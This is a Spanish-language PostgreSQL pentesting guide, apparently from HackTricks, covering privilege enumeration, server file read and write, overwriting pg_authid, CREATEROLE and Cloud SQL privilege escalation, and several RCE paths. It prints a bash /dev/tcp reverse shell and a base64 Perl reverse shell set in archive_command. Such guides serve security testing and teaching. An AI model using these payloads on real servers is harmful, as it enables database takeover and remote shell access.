5432,5433 - Pentesting Postgresql
Utilice Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo. Obtenga acceso hoy:
Información Básica
PostgreSQL se describe como un sistema de base de datos objeto-relacional que es de código abierto. Este sistema no solo utiliza el lenguaje SQL, sino que también lo mejora con características adicionales. Sus capacidades le permiten manejar una amplia gama de tipos de datos y operaciones, lo que lo convierte en una elección versátil para desarrolladores y organizaciones.
Puerto predeterminado: 5432, y si este puerto ya está en uso, parece que PostgreSQL usará el siguiente puerto (probablemente 5433) que no esté en uso.
Conexión y Enumeración Básica
Si al ejecutar \list
encuentras una base de datos llamada rdsadmin
sabrás que estás dentro de una base de datos PostgreSQL de AWS.
Para obtener más información sobre cómo abusar de una base de datos PostgreSQL consulta:
pagePostgreSQL injectionEnumeración Automática
Escaneo de puertos
Según esta investigación, cuando un intento de conexión falla, dblink
arroja una excepción sqlclient_unable_to_establish_sqlconnection
que incluye una explicación del error. A continuación se muestran ejemplos de estos detalles.
El host está inactivo
DETALLE: no se pudo conectar al servidor: No hay ruta al host ¿Está el servidor ejecutándose en el host "1.2.3.4" y aceptando conexiones TCP/IP en el puerto 5678?
El puerto está cerrado
El puerto está abierto
El puerto está abierto o filtrado
En las funciones PL/pgSQL, actualmente no es posible obtener detalles de excepciones. Sin embargo, si tienes acceso directo al servidor PostgreSQL, puedes recuperar la información necesaria. Si extraer nombres de usuario y contraseñas de las tablas del sistema no es factible, puedes considerar utilizar el método de ataque de lista de palabras discutido en la sección anterior, ya que podría dar resultados positivos.
Enumeración de Privilegios
Roles
Tipos de Roles | |
---|---|
rolsuper | El rol tiene privilegios de superusuario |
rolinherit | El rol hereda automáticamente los privilegios de los roles de los que es miembro |
rolcreaterole | El rol puede crear más roles |
rolcreatedb | El rol puede crear bases de datos |
rolcanlogin | El rol puede iniciar sesión. Es decir, este rol puede ser dado como identificador de autorización de sesión inicial. |
rolreplication | El rol es un rol de replicación. Un rol de replicación puede iniciar conexiones de replicación y crear y eliminar espacios de replicación. |
rolconnlimit | Para roles que pueden iniciar sesión, establece el número máximo de conexiones simultáneas que este rol puede realizar. -1 significa sin límite. |
rolpassword | No es la contraseña (siempre se muestra como |
rolvaliduntil | Hora de caducidad de la contraseña (solo se usa para autenticación de contraseña); nulo si no hay vencimiento |
rolbypassrls | El rol omite todas las políticas de seguridad a nivel de fila, consulta Sección 5.8 para más información. |
rolconfig | Valores predeterminados específicos del rol para variables de configuración en tiempo de ejecución |
oid | ID del rol |
Grupos Interesantes
Si eres miembro de
pg_execute_server_program
puedes ejecutar programasSi eres miembro de
pg_read_server_files
puedes leer archivosSi eres miembro de
pg_write_server_files
puedes escribir archivos
Ten en cuenta que en Postgres un usuario, un grupo y un rol son lo mismo. Solo depende de cómo lo uses y si lo permites iniciar sesión.
Tablas
Funciones
Acciones del sistema de archivos
Leer directorios y archivos
Desde este commit los miembros del grupo definido DEFAULT_ROLE_READ_SERVER_FILES
(llamado pg_read_server_files
) y los super usuarios pueden utilizar el método COPY
en cualquier ruta (ver convert_and_check_filename
en genfile.c
):
Recuerda que si no eres un superusuario pero tienes permisos CREATEROLE puedes hacerte miembro de ese grupo:
Hay otras funciones de postgres que se pueden utilizar para leer archivos o listar un directorio. Solo pueden usarlas superusuarios y usuarios con permisos explícitos:
Puedes encontrar más funciones en https://www.postgresql.org/docs/current/functions-admin.html
Escritura de Archivos Simple
Solo los super usuarios y los miembros de pg_write_server_files
pueden usar copy para escribir archivos.
Recuerda que si no eres un super usuario pero tienes los permisos CREATEROLE
puedes hacerte miembro de ese grupo:
Recuerda que COPY no puede manejar caracteres de nueva línea, por lo tanto, incluso si estás usando una carga útil en base64 necesitas enviar un comando en una sola línea.
Una limitación muy importante de esta técnica es que copy
no se puede utilizar para escribir archivos binarios ya que modifica algunos valores binarios.
Carga de archivos binarios
Sin embargo, existen otras técnicas para cargar archivos binarios grandes:
pageBig Binary Files Upload (PostgreSQL)Consejo de recompensa por errores: regístrate en Intigriti, una plataforma de recompensas por errores premium creada por hackers, para hackers. ¡Únete a nosotros en https://go.intigriti.com/hacktricks hoy y comienza a ganar recompensas de hasta $100,000!
Actualización de datos de tabla PostgreSQL mediante escritura de archivo local
Si tienes los permisos necesarios para leer y escribir archivos del servidor PostgreSQL, puedes actualizar cualquier tabla en el servidor sobrescribiendo el nodo de archivo asociado en el directorio de datos de PostgreSQL. Más información sobre esta técnica aquí.
Pasos requeridos:
Obtener el directorio de datos de PostgreSQL
Nota: Si no puedes recuperar la ruta actual del directorio de datos desde la configuración, puedes consultar la versión principal de PostgreSQL a través de la consulta SELECT version()
e intentar adivinar la ruta. Las rutas comunes de directorio de datos en instalaciones de PostgreSQL en Unix son /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Un nombre de clúster común es main
. 2. Obtener una ruta relativa al nodo de archivo, asociado con la tabla objetivo
Esta consulta debería devolver algo como base/3/1337
. La ruta completa en disco será $DATA_DIRECTORY/base/3/1337
, es decir, /var/lib/postgresql/13/main/base/3/1337
. 3. Descargar el nodo de archivo a través de las funciones lo_*
Obtener el tipo de datos, asociado con la tabla objetivo
Utiliza el Editor de Filenode de PostgreSQL para editar el nodo de archivo; establece todos los indicadores booleanos
rol*
en 1 para permisos completos.
(Opcionalmente) Limpia la caché de la tabla en memoria ejecutando una consulta SQL costosa
Ahora deberías ver los valores de la tabla actualizados en PostgreSQL.
También puedes convertirte en un superadministrador editando la tabla pg_authid
. Consulta la siguiente sección.
RCE
RCE a programa
Desde la versión 9.3, solo los superusuarios y los miembros del grupo pg_execute_server_program
pueden usar copy para RCE (ejemplo con exfiltración:
Ejemplo para ejecutar:
Recuerda que si no eres un superusuario pero tienes los permisos CREATEROLE
, puedes hacerte miembro de ese grupo:
O utiliza el módulo multi/postgres/postgres_copy_from_program_cmd_exec
de metasploit.
Más información sobre esta vulnerabilidad aquí. Aunque se reportó como CVE-2019-9193, Postges declaró que era una característica y no se corregirá.
RCE con Lenguajes de PostgreSQL
pageRCE with PostgreSQL LanguagesRCE con extensiones de PostgreSQL
Una vez que hayas aprendido del post anterior cómo cargar archivos binarios, podrías intentar obtener RCE cargando una extensión de postgresql y cargándola.
pageRCE with PostgreSQL ExtensionsRCE con archivo de configuración de PostgreSQL
Los siguientes vectores de RCE son especialmente útiles en contextos de SQLi restringidos, ya que todos los pasos se pueden realizar a través de declaraciones SELECT anidadas.
El archivo de configuración de PostgreSQL es editable por el usuario postgres, que es el que ejecuta la base de datos, por lo que como superusuario, puedes escribir archivos en el sistema de archivos, y por lo tanto puedes sobrescribir este archivo.
RCE con ssl_passphrase_command
Más información sobre esta técnica aquí.
El archivo de configuración tiene algunos atributos interesantes que pueden llevar a RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Ruta de la clave privada de la base de datosssl_passphrase_command = ''
Si el archivo privado está protegido por contraseña (encriptado) postgresql ejecutará el comando indicado en este atributo.ssl_passphrase_command_supports_reload = off
Si este atributo está activado, el comando se ejecutará si la clave está protegida por contraseña cuando se ejecutepg_reload_conf()
.
Entonces, un atacante necesitará:
Volcar la clave privada del servidor
Encriptar la clave privada descargada:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Sobrescribir
Volcar la configuración actual de postgresql
Sobrescribir la configuración con la configuración de atributos mencionada:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Ejecutar
pg_reload_conf()
Al probar esto, noté que solo funcionará si el archivo de clave privada tiene privilegios 640, es propiedad de root y del grupo ssl-cert o postgres (para que el usuario postgres pueda leerlo), y se encuentra en /var/lib/postgresql/12/main.
RCE con archive_command
Más información sobre esta configuración y sobre WAL aquí.
Otro atributo en el archivo de configuración que es explotable es archive_command
.
Para que esto funcione, la configuración archive_mode
debe ser 'on'
o 'always'
. Si es así, podríamos sobrescribir el comando en archive_command
y forzar su ejecución a través de las operaciones de WAL (write-ahead logging).
Los pasos generales son:
Verificar si el modo de archivo está habilitado:
SELECT current_setting('archive_mode')
Sobrescribir
archive_command
con el payload. Por ejemplo, un shell inverso:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Recargar la configuración:
SELECT pg_reload_conf()
Forzar la operación de WAL para que se ejecute, lo que llamará al comando de archivo:
SELECT pg_switch_wal()
oSELECT pg_switch_xlog()
para algunas versiones de Postgres
RCE con bibliotecas de precarga
Más información sobre esta técnica aquí.
Este vector de ataque aprovecha las siguientes variables de configuración:
session_preload_libraries
-- bibliotecas que se cargarán en el servidor PostgreSQL en la conexión del cliente.dynamic_library_path
-- lista de directorios donde el servidor PostgreSQL buscará las bibliotecas.
Podemos establecer el valor de dynamic_library_path
en un directorio, escribible por el usuario postgres
que ejecuta la base de datos, por ejemplo, el directorio /tmp/
, y cargar un objeto malicioso .so
allí. Luego, forzaremos al servidor PostgreSQL a cargar nuestra nueva biblioteca cargada incluyéndola en la variable session_preload_libraries
.
Los pasos del ataque son:
Descargar el
postgresql.conf
originalIncluir el directorio
/tmp/
en el valor dedynamic_library_path
, por ejemplodynamic_library_path = '/tmp:$libdir'
Incluir el nombre de la biblioteca maliciosa en el valor de
session_preload_libraries
, por ejemplosession_preload_libraries = 'payload.so'
Verificar la versión principal de PostgreSQL mediante la consulta
SELECT version()
Compilar el código de la biblioteca maliciosa con el paquete dev correcto de PostgreSQL. Código de ejemplo:
Compilar el código:
Cargar el
postgresql.conf
malicioso, creado en los pasos 2-3, y sobrescribir el originalCargar el
payload.so
del paso 5 en el directorio/tmp
Recargar la configuración del servidor reiniciando el servidor o invocando la consulta
SELECT pg_reload_conf()
En la siguiente conexión a la base de datos, recibirás la conexión de shell inversa.
Elevación de privilegios en Postgres
Elevación de privilegios CREATEROLE
Concesión
Según la documentación: Los roles que tienen el privilegio CREATEROLE
pueden conceder o revocar membresía en cualquier rol que no sea un superusuario.
Por lo tanto, si tienes el permiso CREATEROLE
podrías otorgarte acceso a otros roles (que no sean superusuario) que te permitan leer y escribir archivos y ejecutar comandos:
Modificar Contraseña
Los usuarios con este rol también pueden cambiar las contraseñas de otros no superusuarios:
Escalando a SUPERUSER
Es bastante común encontrar que los usuarios locales pueden iniciar sesión en PostgreSQL sin proporcionar ninguna contraseña. Por lo tanto, una vez que hayas obtenido permisos para ejecutar código, puedes abusar de estos permisos para obtener el rol de SUPERUSER
:
Esto suele ser posible debido a las siguientes líneas en el archivo pg_hba.conf
:
ALTER TABLE privesc
En este informe se explica cómo fue posible realizar una escalada de privilegios en Postgres GCP abusando del privilegio ALTER TABLE que se otorgó al usuario.
Cuando intentas hacer que otro usuario sea propietario de una tabla, deberías recibir un error que lo impida, pero aparentemente GCP dio esa opción al usuario postgres que no es superusuario en GCP:
Al unir esta idea con el hecho de que cuando se ejecutan los comandos INSERT/UPDATE/ANALYZE en una tabla con una función de índice, la función se llama como parte del comando con los permisos del propietario de la tabla. Es posible crear un índice con una función y dar permisos de propietario a un superusuario sobre esa tabla, y luego ejecutar ANALYZE sobre la tabla con la función maliciosa que podrá ejecutar comandos porque está utilizando los privilegios del propietario.
Explotación
Comienza creando una nueva tabla.
Inserta contenido irrelevante en la tabla para proporcionar datos para la función de índice.
Desarrolla una función de índice maliciosa que contenga una carga útil de ejecución de código, permitiendo la ejecución de comandos no autorizados.
ALTERA al propietario de la tabla a "cloudsqladmin," que es el rol de superusuario de GCP utilizado exclusivamente por Cloud SQL para gestionar y mantener la base de datos.
Realiza una operación ANALYZE en la tabla. Esta acción obliga al motor de PostgreSQL a cambiar al contexto de usuario del propietario de la tabla, "cloudsqladmin." En consecuencia, la función de índice maliciosa se llama con los permisos de "cloudsqladmin," lo que permite la ejecución del comando de shell previamente no autorizado.
En PostgreSQL, este flujo se ve algo así:
Entonces, la tabla shell_commands_results
contendrá la salida del código ejecutado:
Inicio de sesión local
Algunas instancias de PostgreSQL mal configuradas podrían permitir el inicio de sesión de cualquier usuario local, es posible hacerlo desde 127.0.0.1 utilizando la función dblink
:
Ten en cuenta que para que la consulta anterior funcione necesita existir la función dblink
. Si no existe, puedes intentar crearla con
Si tienes la contraseña de un usuario con más privilegios, pero al usuario no se le permite iniciar sesión desde una IP externa, puedes usar la siguiente función para ejecutar consultas como ese usuario:
Es posible verificar si esta función existe con:
Función definida personalizada con SECURITY DEFINER
En este informe, los pentesters pudieron escalar privilegios dentro de una instancia de postgres proporcionada por IBM, porque encontraron esta función con la bandera SECURITY DEFINER:
Como se explica en la documentación una función con SECURITY DEFINER se ejecuta con los privilegios del usuario que la posee. Por lo tanto, si la función es vulnerable a la Inyección SQL o realiza algunas acciones privilegiadas con parámetros controlados por el atacante, podría ser abusada para escalar privilegios dentro de postgres.
En la línea 4 del código anterior se puede ver que la función tiene la bandera SECURITY DEFINER.
Y luego ejecutar comandos:
Realizar Fuerza Bruta con PL/pgSQL
PL/pgSQL es un lenguaje de programación completo que ofrece un mayor control procedural en comparación con SQL. Permite el uso de bucles y otras estructuras de control para mejorar la lógica del programa. Además, las sentencias SQL y los disparadores tienen la capacidad de invocar funciones que se crean utilizando el lenguaje PL/pgSQL. Esta integración permite un enfoque más completo y versátil para la programación y automatización de bases de datos. Puedes abusar de este lenguaje para pedirle a PostgreSQL que realice fuerza bruta en las credenciales de los usuarios.
pagePL/pgSQL Password BruteforceEscalada de Privilegios Sobrescribiendo Tablas Internas de PostgreSQL
El siguiente vector de escalada de privilegios es especialmente útil en contextos de SQLi restringidos, ya que todos los pasos se pueden realizar a través de declaraciones SELECT anidadas.
Si puedes leer y escribir archivos del servidor PostgreSQL, puedes convertirte en un superusuario sobrescribiendo el filenode en disco de PostgreSQL, asociado con la tabla interna pg_authid
.
Lee más sobre esta técnica aquí.
Los pasos del ataque son:
Obtener el directorio de datos de PostgreSQL
Obtener una ruta relativa al filenode, asociado con la tabla
pg_authid
Descargar el filenode a través de las funciones
lo_*
Obtener el tipo de datos, asociado con la tabla
pg_authid
Utilizar el Editor de Filenode de PostgreSQL para editar el filenode; establecer todos los indicadores booleanos
rol*
en 1 para permisos completos.Volver a cargar el filenode editado a través de las funciones
lo_*
, y sobrescribir el archivo original en el disco(Opcionalmente) Limpiar la caché de la tabla en memoria ejecutando una consulta SQL costosa
Ahora deberías tener los privilegios de un superadministrador completo.
POST
registro
Dentro del archivo postgresql.conf puedes habilitar los registros de postgresql cambiando:
Luego, reinicia el servicio.
pgadmin
pgadmin es una plataforma de administración y desarrollo para PostgreSQL. Puedes encontrar contraseñas dentro del archivo pgadmin4.db. Puedes descifrarlas utilizando la función decrypt dentro del script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
pg_hba
La autenticación del cliente en PostgreSQL se gestiona a través de un archivo de configuración llamado pg_hba.conf. Este archivo contiene una serie de registros, cada uno especificando un tipo de conexión, rango de direcciones IP del cliente (si corresponde), nombre de la base de datos, nombre de usuario y el método de autenticación a utilizar para las conexiones coincidentes. El primer registro que coincida con el tipo de conexión, dirección del cliente, base de datos solicitada y nombre de usuario se utiliza para la autenticación. No hay un mecanismo de respaldo si la autenticación falla. Si ningún registro coincide, se deniega el acceso.
Los métodos de autenticación basados en contraseña disponibles en pg_hba.conf son md5, crypt y password. Estos métodos difieren en cómo se transmite la contraseña: en formato MD5-hashed, cifrada con crypt o en texto claro. Es importante tener en cuenta que el método crypt no se puede utilizar con contraseñas que hayan sido cifradas en pg_authid.
Última actualización